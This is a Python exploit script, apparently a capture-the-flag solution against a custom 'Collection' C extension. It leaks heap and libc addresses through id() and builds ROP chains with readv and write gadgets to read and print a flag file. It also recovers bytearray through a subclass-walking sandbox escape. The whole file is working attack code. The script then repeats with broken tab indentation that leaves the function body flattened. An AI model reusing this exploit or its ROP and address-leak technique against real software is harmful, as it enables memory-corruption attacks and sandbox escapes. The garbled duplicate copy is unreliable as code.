ducphanduyagentp/exp.py

## exp.py
# import Collection
bytearray = ().__class__.__base__.__subclasses__()[5]

def p64(addr):
    x = '{0:016x}'.format(addr)
    return bytearray.fromhex(x)[::-1]


b = Collection.Collection({'1':0x1337})
libc_base = id(b) + 0xe27198 - 0x13e0dd0
print('libc_base '+hex(libc_base))

pop_rdi = libc_base + 0x0002155f
pop_rsi = libc_base + 0x00023e6a
pop_rdx = libc_base + 0x00001b96
readv = libc_base + 0x116600
write = libc_base + 0x110140


flag = Collection.Collection({'1':0x1337, '2':0x1338, '3':0x1339, '4':0x133a})
flag_addr = id(flag)
print('flag = '+hex(flag_addr))

iovec = Collection.Collection({'1':flag_addr, '2':0x100})
iovec_addr = id(iovec)
print('iovec = '+hex(iovec_addr))

rop2 = Collection.Collection({'0':pop_rdi, "1":1023, "2":pop_rsi, "3":iovec_addr+0x18, "4":pop_rdx, "5":1, "6":readv, "7":pop_rdi, "8":1, "9":pop_rsi, "10":flag_addr, "11":pop_rdx, "12":0x100, "13":write})
rop = Collection.Collection({'0':libc_base+0x520a5, "1":0x1337, "2":0x1337, "3":0x1337, "4":0x1337, "5":0x1337, "6":0x1337, "7":0x1337, "8":0x1337, "9":0x1337, "10":0x1337, "11":0x1337, "12":0x1337, "13":0x1337, "14":0x1337, "15":0x1337, "16":0x1337, "17":0x1337, "18":0x1337, "19":id(rop2) + 0x18, "20":libc_base+0x520ed})
rop_addr = id(rop)


a = Collection.Collection({"xxxx":{0xdead:0xbeef, 0x1337:0x31337}, 'a':0xdead, 'b':0xbeef})
print(a.get("xxxx"))
print(a.__dir__())
x = p64(libc_base + 0x86315)
x = x* (0x600//8)

print(a.get("xxxx")[rop_addr+0x10])
	# import Collection
	bytearray = ().__class__.__base__.__subclasses__()[5]

	def p64(addr):
	x = '{0:016x}'.format(addr)
	return bytearray.fromhex(x)[::-1]


	b = Collection.Collection({'1':0x1337})
	libc_base = id(b) + 0xe27198 - 0x13e0dd0
	print('libc_base '+hex(libc_base))

	pop_rdi = libc_base + 0x0002155f
	pop_rsi = libc_base + 0x00023e6a
	pop_rdx = libc_base + 0x00001b96
	readv = libc_base + 0x116600
	write = libc_base + 0x110140


	flag = Collection.Collection({'1':0x1337, '2':0x1338, '3':0x1339, '4':0x133a})
	flag_addr = id(flag)
	print('flag = '+hex(flag_addr))

	iovec = Collection.Collection({'1':flag_addr, '2':0x100})
	iovec_addr = id(iovec)
	print('iovec = '+hex(iovec_addr))

	rop2 = Collection.Collection({'0':pop_rdi, "1":1023, "2":pop_rsi, "3":iovec_addr+0x18, "4":pop_rdx, "5":1, "6":readv, "7":pop_rdi, "8":1, "9":pop_rsi, "10":flag_addr, "11":pop_rdx, "12":0x100, "13":write})
	rop = Collection.Collection({'0':libc_base+0x520a5, "1":0x1337, "2":0x1337, "3":0x1337, "4":0x1337, "5":0x1337, "6":0x1337, "7":0x1337, "8":0x1337, "9":0x1337, "10":0x1337, "11":0x1337, "12":0x1337, "13":0x1337, "14":0x1337, "15":0x1337, "16":0x1337, "17":0x1337, "18":0x1337, "19":id(rop2) + 0x18, "20":libc_base+0x520ed})
	rop_addr = id(rop)


	a = Collection.Collection({"xxxx":{0xdead:0xbeef, 0x1337:0x31337}, 'a':0xdead, 'b':0xbeef})
	print(a.get("xxxx"))
	print(a.__dir__())
	x = p64(libc_base + 0x86315)
	x = x* (0x600//8)

	print(a.get("xxxx")[rop_addr+0x10])